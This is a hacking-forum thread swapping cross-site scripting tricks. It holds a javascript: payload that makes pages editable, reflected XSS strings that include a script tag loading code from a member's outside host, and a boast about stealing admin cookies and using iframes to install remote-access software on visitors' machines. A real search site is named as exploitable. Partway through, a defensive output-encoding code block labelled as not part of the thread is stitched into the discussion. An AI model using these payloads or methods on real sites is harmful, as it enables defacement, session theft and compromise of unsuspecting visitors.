
fun with xss


ghost's Avatar
0 0

Here is a little fun you can have with xss. You can use javascript code: javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: document *damn smileys)

inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to their liking. *I know this is old code, and I know that lots of people know about it, but I have never heard of anyone injecting it into an xss attack. (have fun)


rex_mundi's Avatar
☆ Lucifer ☆
3,050 12

Is this your mums site? :right:


yours31f's Avatar
Retired
10 0

Nope. One of my friends asked me to help him see if it was secure. (I didn't do much btw so I don't know if it has any holes.)


rex_mundi's Avatar
☆ Lucifer ☆
3,050 12

Trying to deface a dead pensioner's site man, tut tut.


yours31f's Avatar
Retired
10 0

Nope, I was just helping to secure it. I was asked for help, and it will be fixed tomorrow.


ghost's Avatar
0 0

Best fun I've ever had with XSS was iFrames. The XSS allowed me to chuck a cookie logger on the page. Then once I had admin cPanel I chucked iFrames all over it : ] If a site already has some activex on it then you're in luck. Create an iFrame linking to your logmein vpn install software page. Then upon visiting a vnc is installed for you. Wow wasn't that easy. I'll draw up some code for it today. I got work at computer help now :ninja:


yours31f's Avatar
Retired
10 0

right now I'm just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>


ghost's Avatar
0 0

yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though. Edit: I lied about the switch case. That is the default error message, but you still won't be able to xss it since it won't return the values back onto the page.
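Added example, not part of the thread: the strings posted above only do anything when a page returns input without encoding it for the HTML context it lands in. This sketch (function names and the sample form are assumptions) encodes for attribute and textarea contexts and restricts link schemes, so the strings quoted in this thread come back as inert text.

```javascript
// Added example; function names and the form layout are assumptions.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode text for element bodies and quoted attribute values.
function encodeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Permit only http, https and mailto links (plus scheme-less relative URLs).
function safeHref(url) {
  // Browsers drop tabs, newlines and leading control characters before
  // parsing the scheme, so strip them before checking it.
  const cleaned = String(url).replace(/[\u0000-\u0020\u007f]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (scheme && !['http', 'https', 'mailto'].includes(scheme[1].toLowerCase())) {
    return '#';
  }
  return encodeHtml(url);
}

// Render user-supplied values into three different HTML contexts.
function renderProfileForm(name, bio, homepage) {
  return [
    `<input name="name" value="${encodeHtml(name)}">`,
    `<textarea name="bio">${encodeHtml(bio)}</textarea>`,
    `<a href="${safeHref(homepage)}">homepage</a>`,
  ].join('\n');
}

// Constructed input: the strings quoted in this thread.
const SAMPLE = {
  name: '"> <script>alert("xssed");</script>',
  bio: '"</textarea> <script>alert("xssed");</script>',
  homepage: "javascript:document.body.contentEditable='true'; document.designMode='on'; void 0",
};

console.log(renderProfileForm(SAMPLE.name, SAMPLE.bio, SAMPLE.homepage));
```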


rex_mundi's Avatar
☆ Lucifer ☆
3,050 12

Dude, don't encourage him.


rex_mundi's Avatar
☆ Lucifer ☆
3,050 12

You know it's true :p


ghost's Avatar
0 0

yours31f wrote: right now I'm just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>

Go back to the cheat sheet and get some more ideas.


ghost's Avatar
0 0

Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can be used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused; attempt not to add on to the misuse.


ghost's Avatar
0 0

:| You shouldn't put URLs if you're going to tell the community that they're vulnerable to some sort of attack…


ghost's Avatar
0 0

Technically, I didn't post the URL. I only posted the host, which is one of many parts of a full URL. Despite this, I do understand what you are trying to say and I'll be more careful next time. :D


yours31f's Avatar
Retired
10 0

And the one I posted (as far as I know) is not.


ghost's Avatar
0 0

Well you must not know much, because what you posted is a full-fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.


ghost's Avatar
0 0

HZ wrote: Well you must not know much, because what you posted is a full-fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

I think he was speaking of the fact that the URL he posted wasn't vulnerable.

Please, as a (new) member of this community, don't be so quick to flame other members of the community.


yours31f's Avatar
Retired
10 0

That's exactly what I was saying.


ghost's Avatar
0 0

Understood, but despite all of this, Google is still your best friend. :D


ghost's Avatar
0 0

… Let it go.


ghost's Avatar
0 0

Well that was a brilliant discussion about xss, wasn't it.